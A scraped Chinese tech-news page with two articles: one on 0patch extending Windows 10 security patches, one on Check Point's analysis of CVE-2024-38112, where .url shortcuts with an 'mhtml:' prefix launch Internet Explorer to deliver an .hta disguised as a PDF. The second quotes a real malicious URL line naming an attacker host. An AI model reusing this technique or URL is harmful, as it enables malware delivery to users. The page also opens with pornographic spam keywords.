欧美vvv,亚洲第一成人在线,亚洲成人欧美日韩在线观看,日本猛少妇猛色XXXXX猛叫

新聞資訊
    理 | 鄭麗媛
    出品 | 程序人生(ID:coder_life)

    對于許多 Windows 用戶來說,2025 年 10 月 14 日是一個很特別的日子:那一天,Windows 10 會正式退役,自此微軟將不再提供官方支持。

    也就是說,只剩下不到 500 天,Windows 10 就要變成“野孩子”了。

    然而,近日 0patch 公司重磅宣布,屆時他們將無縫接棒微軟:等微軟終止支持 Windows 10 之后,0patch 會額外提供 5 年的安全補丁!

    0patch 目前仍在為 Windows 7 提供支持

    在進入正題前,我們先大致了解一下 0patch 這家公司。

    從官網介紹來看,0patch 自詡是“解決巨大安全問題的微觀解決方案”,主要向全球計算機和其他設備發送微型代碼補丁(“微補丁”),以修復各種甚至閉源產品中的軟件漏洞:“有了 0patch,打補丁時無需重啟或停機,也不用擔心大規模的官方更新會破壞生產。”

    據悉,0patch 所提供的微型代碼補丁非常輕便和簡單,讓軟件打補丁變得幾乎“難以察覺”:能把補丁部署時間從幾個月縮短到幾個小時,另外審查微型補丁的成本很低,且在本地或遠程即時應用和刪除補丁的能力也極大簡化了生產測試。

    除此之外,0patch 還是一家致力于為過期產品提供安全更新的公司。

    記得在 2023 年 1 月,當時微軟通過 ESU 計劃為 Windows 7 提供了最后一批安全更新,0patch 便立刻宣布將為 Windows 7 以及 Windows Server 2008 R2 設備提供微補丁服務至 2025 年 1 月:“我們決定繼續為 Windows 7 和 Windows Server 2008 R2 提供安全補丁,以修補可能被利用的關鍵漏洞。”

    考慮到以上情況,此次 0patch 宣布為 Windows 10 繼續提供 5 年安全補丁的決定,似乎也就在意料之中了。

    不想/不能升級 Windows 11,有兩種方案

    事實上,盡管微軟一個勁兒地在強調 Windows 10 即將退役、為了安全需盡快升級到 Windows 11,但對于不少用戶而言,其實并沒有太多實感。

    如果沒有其他支持,那么等到 2025 年 10 月 14 日究竟會發生什么呢?

    或許可以參考早在 2020 年 1 月結束支持的 Windows 7:一臺在 2020 年經過最后一次更新的 Windows 7 電腦,若沒有額外的安全補丁則很容易就被入侵,目前光是公開已知會影響 Windows 7 的關鍵漏洞,就有 70 多個了。

    以此類推,如果 2025 年 10 月之后 Windows 10 電腦不打補丁,很可能一個月內就會出現第一個關鍵漏洞,然后在隨后的幾個月內出現越來越多漏洞,并無限期地存在于電腦中。最后隨著時間的推移,電腦被入侵的風險必然會逐漸增大,除非你不聯網。

    因此微軟建議,讓 Windows 保持安全的唯一“免費”方法,就是升級到 Windows 11——但 0patch 說出了許多人的心聲:“我們中的許多人,不想或根本不能升級到 Windows 11。”

    • 不想升級,是因為我們已經習慣了 Windows 10 的用戶界面。不想去搜索某個按鈕被移動到了哪里,也不想知道為什么我們每天都在用的應用不在了。現有的 Windows 10 已經能滿足我們的一切需求。

    • 不想升級,是因為 Windows 11 中臃腫軟件、開始菜單廣告和嚴重的隱私問題等情況越來越多,也不想讓 Recall 這樣的功能不斷記錄我們在電腦上的活動。

    • 不想升級,是因為有些應用可能無法在 Windows 11 上運行,例如醫療設備、制造設備、POS 終端、特殊用途設備和 ATM,它們運行在 Windows 10 上,無法輕松升級。

    • 不能升級,是因為我們的硬件根本可能不符合升級到 Windows 11 的條件。據 Canalys 估計,全球有 2.4 億臺計算機不符合 Windows 11 硬件要求,缺乏可信平臺模塊(TPM)2.0、支持的 CPU、4GB 內存、具有安全啟動功能的 UEFI 固件或支持的 GPU。

    在這種情況下,多數用戶有兩種方法可以確保 Windows 10 繼續安全運行:擴展安全更新(ESU)或者 0patch。

    0patch 更便宜、承諾提供更長時間的支持

    其中,擴展安全更新(ESU)是微軟官方給出的一種臨時解決方案,主要是針對組織和企業從 Windows 10 過渡到新的操作系統時使用:如果你想繼續安全地使用 Windows 10 ,就必須要付費。

    目前,ESU 的定價只針對企業和教育組織,面向個人消費者的定價尚未公開。其中教育組織的收費很便宜, 三年只需 7 美元,而企業則相對貴了許多:第一年每臺 PC 將收取 61 美元(人民幣約 443 元)的費用,第二年 122 美元(人民幣約 886 元),到了第三年要為每臺 Windows 10 設備支付 244 美元(人民幣約 1772 元)的價格來獲得安全更新。

    0patch 指出,按照擴展安全更新(ESU)的收費標準,如果企業中有 1 萬臺 Windows 10 電腦,則需花費 400 萬美元。

    “如果有一種方法,可以花更少的錢得到更多的東西就好了……”

    出于這個想法,0patch 宣布從 2025 年 10 月起,他們將為 Windows 10 提供至少 5 年的關鍵安全補丁——如果市場有需求,時間甚至會更長。

    在官方博客中,0patch 介紹自己是 Windows 唯一的非官方安全補丁提供商,并具體描述了其補丁的特點:針對 2025 年 10 月 14 日之后 Windows 10 中可能被利用的重要漏洞,0patch 將提供“微補丁”。

    • 這些補丁非常小,通常只有幾條 CPU 指令,并可應用于內存中正在運行的進程,而不會修改二進制文件的任何字節。

    • 下載補丁后無需重啟計算機,因為在內存中應用補丁只需短暫停止應用、打上補丁,然后讓它繼續運行即可,用戶甚至不會注意到他們在編寫文檔的時候就已經打上了補丁。

    不過與微軟的 ESU 一樣,0patch 也不是一項免費服務,只是它承諾提供更長時間的支持和更多好處,例如更快、干擾更少的補丁,修復制造商未觸及的漏洞,以及為非微軟產品提供補丁等等。

    據悉 0patch 按年訂購,面向個人和小型企業的 0patch PRO 每臺電腦 24.95 歐元(人民幣約 192 元)+稅,而適用于大中型企業的 0patch Enterprise 每臺電腦 34.95 歐元(人民幣約 271 元)+稅。0patch 也補充道,未來這個價格可能會調整,但任何以當前價格訂閱的用戶都可以在兩年內繼續以此價格訂閱。

    參考鏈接:

    https://blog.0patch.com/

    https://www.neowin.net/news/windows-10-will-get-five-years-of-additional-support-thanks-to-0patch/

    由 CSDN 和 Boolan 聯合主辦的「2024 全球軟件研發技術大會(SDCon)」將于 7 月 4 -5 日在北京威斯汀酒店舉行。

    由世界著名軟件架構大師、云原生和微服務領域技術先驅 Chris Richardson 和 MIT 計算機與 AI 實驗室(CSAIL)副主任,ACM Fellow Daniel Jackson 領銜,華為、BAT、微軟、字節跳動、京東等技術專家將齊聚一堂,共同探討軟件開發的最前沿趨勢與技術實踐。

    整理 | 鄭麗媛
    出品 | CSDN(ID:CSDNnews)

    誰能想到,早在 2022 年 6 月 15 日正式退役的 IE 瀏覽器,近日還能因漏洞被推上風口浪尖?

    全球網絡安全解決方案提供商 Check Point Research(簡稱為 CPR)最近發現:有攻擊者在過去 18 個月里,通過構建特殊的 Windows Internet 快捷方式文件(即 .url),引誘用戶點擊并調用 IE 瀏覽器來訪問攻擊者控制的 URL,以此進行惡意攻擊。

    據了解,這種漏洞甚至可以繞過 Windows 10、Windows 11 系統的安全防護。

    強制調用 IE 瀏覽器打開 URL

    據悉,該漏洞由 CPR 研究人員發現,追蹤編號為 CVE-2024-38112,微軟方面將其描述為 Windows MSHTML 平臺欺騙漏洞,自 2023 年 1 月以來就一直在被黑客利用:“我們發現的惡意 .url 樣本最早可以追溯到 2023 年 1 月(一年多前),最晚可以追溯到 2024 年 5 月 13 日。這表明,網絡罪犯使用這種攻擊技術已經有一段時間了。”

    通過對攻擊過程的詳細分析,CPR 研究人員將該漏洞的實現分解為兩個步驟:

    • 第一步是利用“mhtml”技巧,使得攻擊者可調用已退役的 IE 而非更安全的 Chrome/Edge。

    • 第二步是通過某種 IE 技巧隱藏 .hta 這個擴展名,讓受害者以為他們只是打開了一個 PDF 文件——但實際上,他們正在下載并啟動一個惡意的 .hta 應用程序。

    那么接下來,我們就先了解一下這個能在 Windows 中調用 IE 瀏覽器的“mhtml”技巧。

    一般情況下,Internet 快捷方式文件(即 .url)是一個文本文件,里面包含各種配置信息,如顯示什么圖標、雙擊時打開什么鏈接等。將其保存為 .url 文件并雙擊后,Windows 會在默認瀏覽器中打開這個 URL。

    然而,攻擊者發現可以在 URL 指令中使用 mhtml: URI 處理程序,以此強制用 IE 瀏覽器打開指定的 URL。以下面這個惡意 .url 樣本為例:

    可以看到,.url 文件的最后幾行字符串指向 Microsoft Edge 應用程序文件中的一個自定義圖標。乍一看,它似乎指向一個 PDF 文件,但實際上并非如此。CPR 研究人員發現這個關鍵字的值與通常的關鍵字有很大不同:普通 .url 文件的參數類似于 URL=https://www.google.com;但這個惡意樣本的值是 URL=mhtml:http://cbmelipilla.cl/te/test1.html!x-usc:http://cbmelipilla.cl/te/test1.html。

    它使用了一個特殊的前綴“mhtml:”。簡單說明一下 MHTML,這是一種“聚合 HTML 文檔的 MIME 封裝”文件,是 IE 瀏覽器中引入的一種存儲文件技術,可將包括圖像在內的整個網頁封裝成一個單一檔案。

    CPR 研究人員指出,這樣的惡意 .url 文件在 Windows 11 中會顯示為一個指向 PDF 文件的鏈接:

    如果受害者想打開 PDF,雙擊這個 .url 文件,然后便會彈出下面這個來自 IE 瀏覽器的窗口:

    沒錯,攻擊者使用 mhtml: URI 啟動 URL 后,Windows 會自動在 IE 瀏覽器中啟動 URL,而不是默認瀏覽器。如文章開頭所說,IE 瀏覽器早在 2022 年就退出歷史舞臺了,在典型的 Windows 10/11 操作系統上,因其安全性不足,用戶一般無法直接用 IE 去訪問網站。

    不過有一點需要明確:盡管 IE 已被微軟宣布“退役”,但從技術上講,IE 仍是 Windows 系統的一部分,IE 使用的專有瀏覽器引擎 MSHTML (Trident)也仍包含在操作系統中,微軟計劃至少支持該引擎到 2029 年。

    因此,攻擊者使用“mhtml”技巧,讓本意想打開 PDF 的用戶,實際上正在用不安全且過時的 IE 訪問攻擊者控制的網站,尤其在 IE 下載惡意文件時安全警告也相對較少。

    打開一個偽裝成 PDF 的惡意 .hta 文件

    既然打開的不是 PDF,那受害者通過 IE 打開的到底是什么呢?

    根據 IE 瀏覽器的彈出窗口顯示,它要求用戶打開一個名為 .Books_A0UJKO.pdf 的 PDF 文件:

    可一旦點擊了這個“Open”(默認選項),緊接著又會跳出另一個窗口:IE 保護模式下的警告提示。

    到了這一步,如果用戶一直以為自己打開的不過是個 PDF,大概率會忽略這個警告,那么打開的就會是一個偽裝成 PDF 的惡意 .hta 文件。這是一個從 HTML 文檔中調用的可執行程序,通過一個名為 Microsoft HTML Application Host(mshta.exe)的工具在 Windows 上運行。

    CPR 研究人員解釋道:“如果我們仔細觀察 HTTP 流量,就會發現在字符串末尾有許多不可打印的字符——最后是 .hta 字符串,這才是真正的(危險的)擴展名。”

    但這個 .hta 字符串被隱藏了:用戶看不到真實的擴展名,所以無防備地繼續點擊文件,根本不知道自己其實正在下載并啟動一個危險的 .hta 應用程序。

    一定要警惕從不可信來源發送的 .url 文件

    據 CPR 研究人員證實,這個漏洞所用的技巧在 Windows 10/11 操作系統上均可實現。

    于是,CPR 方面在 2024 年 5 月 16 日向微軟安全響應中心(MSRC)報告了該漏洞。此后,雙方一直就此事密切合作,終于在 7 月 9 日發布了微軟官方補丁(CVE-2024-38112)。

    通用漏洞評分系統(CVSS)來看,CVE-2024-38112 的評分為 7.5(滿分 10 分),屬于重要漏洞攻擊者需采取額外行動才能確保成功利用該漏洞。而不論是微軟還是 CPR,都強烈建議 Windows 用戶盡快更新該補丁,因為根據調查顯示該漏洞已被黑客利用一年多了。

    最后,CPR 也給出了重要提醒:“對于相關的 Windows 用戶,我們建議一定要警惕從不可信來源發送的 .url 文件,畢竟這種類型的攻擊需要一些用戶交互(如忽略警告彈窗)才能成功。”

    參考鏈接:

    https://research.checkpoint.com/2024/resurrecting-internet-explorer-threat-actors-using-zero-day-tricks-in-internet-shortcut-file-to-lure-victims-cve-2024-38112/

    https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38112

    大模型刷新一切,讓我們有著諸多的迷茫,AI 這股熱潮究竟會推著我們走向何方?面對時不時一夜變天,焦慮感油然而生,開發者怎么能夠更快、更系統地擁抱大模型?《新程序員 007》以「大模型時代,開發者的成長指南」為核心,希望撥開層層迷霧,讓開發者定下心地看到及擁抱未來。

    讀過本書的開發者這樣感慨道:“讓我驚喜的是,中國還有這種高質量、貼近開發者的雜志,我感到非常激動。最吸引我的是里面有很多人對 AI 的看法和經驗和一些采訪的內容,這些內容既真實又有價值。”

網站首頁   |    關于我們   |    公司新聞   |    產品方案   |    用戶案例   |    售后服務   |    合作伙伴   |    人才招聘   |   

友情鏈接: 餐飲加盟

地址:北京市海淀區    電話:010-     郵箱:@126.com

備案號:冀ICP備2024067069號-3 北京科技有限公司版權所有